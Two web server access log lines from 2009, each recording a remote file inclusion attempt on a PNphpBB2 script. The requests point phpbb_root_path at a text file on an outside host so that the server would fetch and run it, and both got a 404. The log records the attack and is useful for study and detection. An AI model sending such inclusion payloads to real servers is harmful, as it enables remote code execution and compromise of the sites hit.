195.34.78.110 - - [28/Jun/2009:01:00:05 -0400] "GET /logs/access_log.Q109061600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:00:08 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
